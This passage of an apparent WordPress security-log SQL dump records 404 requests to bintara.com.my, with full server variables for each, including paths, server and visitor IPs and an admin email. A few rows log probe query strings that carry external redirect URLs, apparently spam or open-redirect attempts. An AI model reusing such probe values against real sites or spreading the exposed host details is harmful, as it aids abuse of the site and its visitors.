Yx)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"192.3.208.116\";s:11:\"REMOTE_PORT\";s:5:\"16480\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xatz8oq@uz@DI827WH6zTQAAAUI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571517426.7416\";s:12:\"REQUEST_TIME\";s:10:\"1571517426\";}}','notice','2019-10-19 20:37:09','2019-10-19 20:37:07',35307920,37120800,'https://bintara.com.my/?page_id=18',1,0,'192.3.208.116'),(28474,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-54/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-54/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-54/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XauPaY7-RFqMeLUZjguivAAAAIs\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-54/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.149\";s:11:\"REMOTE_PORT\";s:4:\"7556\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-54/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-54/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XauPaY7-RFqMeLUZjguivAAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571524457.2485\";s:12:\"REQUEST_TIME\";s:10:\"1571524457\";}}','notice','2019-10-19 22:34:19','2019-10-19 22:34:17',34196832,36002088,'https://bintara.com.my/toughbook-54/',1,0,'207.46.13.149'),(28475,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-l1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-l1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-l1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XauXlrVvTBqXFHRB7z86RAAAABM\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-l1/\";s:11:\"REMOTE_ADDR\";s:12:\"157.55.39.55\";s:11:\"REMOTE_PORT\";s:4:\"3298\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-l1/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-l1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XauXlrVvTBqXFHRB7z86RAAAABM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571526550.4321\";s:12:\"REQUEST_TIME\";s:10:\"1571526550\";}}','notice','2019-10-19 23:09:13','2019-10-19 23:09:10',34206072,36001992,'https://bintara.com.my/toughbook-l1/',1,0,'157.55.39.55'),(28476,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.12026; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"4B3457EE-0F46-42A9-9010-2CF568C884E4\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.12026\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XavEIzKMalUtM1c0j9aijQAAAEE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"183.171.185.41\";s:11:\"REMOTE_PORT\";s:5:\"50717\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XavEIzKMalUtM1c0j9aijQAAAEE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571537955.2506\";s:12:\"REQUEST_TIME\";s:10:\"1571537955\";}}','notice','2019-10-20 02:19:17','2019-10-20 02:19:15',35271816,37073312,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'183.171.185.41'),(28477,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/service-title-2/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/service-title-2/\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/service-title-2/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XavQfjKMalUtM1c0j9a27gAAAEE\";s:12:\"REDIRECT_URL\";s:17:\"/service-title-2/\";s:11:\"REMOTE_ADDR\";s:12:\"54.36.150.88\";s:11:\"REMOTE_PORT\";s:5:\"27848\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"https://bintara.com.my/service-title-2/\";s:10:\"SCRIPT_URL\";s:17:\"/service-title-2/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XavQfjKMalUtM1c0j9a27gAAAEE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571541118.9278\";s:12:\"REQUEST_TIME\";s:10:\"1571541118\";}}','notice','2019-10-20 03:12:02','2019-10-20 03:11:59',35361072,37160040,'https://bintara.com.my/service-title-2/',1,0,'54.36.150.88'),(28478,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:149:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 Core/1.47.516.400 QQBrowser/9.4.8186.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"91.243.223.170\";s:11:\"REMOTE_PORT\";s:5:\"52940\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XavuoeMqah-BQDE-xinwXQAAANA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571548833.4646\";s:12:\"REQUEST_TIME\";s:10:\"1571548833\";}}','notice','2019-10-20 05:20:35','2019-10-20 05:20:33',34919104,36728352,'https://bintara.com.my/?page_id=18',1,0,'91.243.223.170'),(28479,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"49783\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xav-U@Mqah-BQDE-xin7GAAAAMM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571553108.0237\";s:12:\"REQUEST_TIME\";s:10:\"1571553108\";}}','notice','2019-10-20 06:31:51','2019-10-20 06:31:48',35315768,37117688,'https://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(28480,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:123:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fmyvyz.ru%2Fuser%2FBlaineCoombs791%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:140:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 OPR/40.0.2308.81 (Edition Yx)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:121:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fmyvyz.ru%2Fuser%2FBlaineCoombs791%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"107.175.153.230\";s:11:\"REMOTE_PORT\";s:4:\"4715\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XawlNh8r@wEAesy2W-XofQAAAFA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571562806.3405\";s:12:\"REQUEST_TIME\";s:10:\"1571562806\";}}','notice','2019-10-20 09:13:29','2019-10-20 09:13:26',35316896,37129808,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fmyvyz.ru%2Fuser%2FBlaineCoombs791%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'107.175.153.230'),(28481,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:140:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 OPR/40.0.2308.81 (Edition Yx)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"107.175.153.230\";s:11:\"REMOTE_PORT\";s:5:\"36976\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XawlQOMqah-BQDE-xikT@AAAAMI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571562816.6562\";s:12:\"REQUEST_TIME\";s:10:\"1571562816\";}}','notice','2019-10-20 09:13:38','2019-10-20 09:13:37',34924472,36739320,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'107.175.153.230'),(28482,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:149:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 Core/1.47.516.400 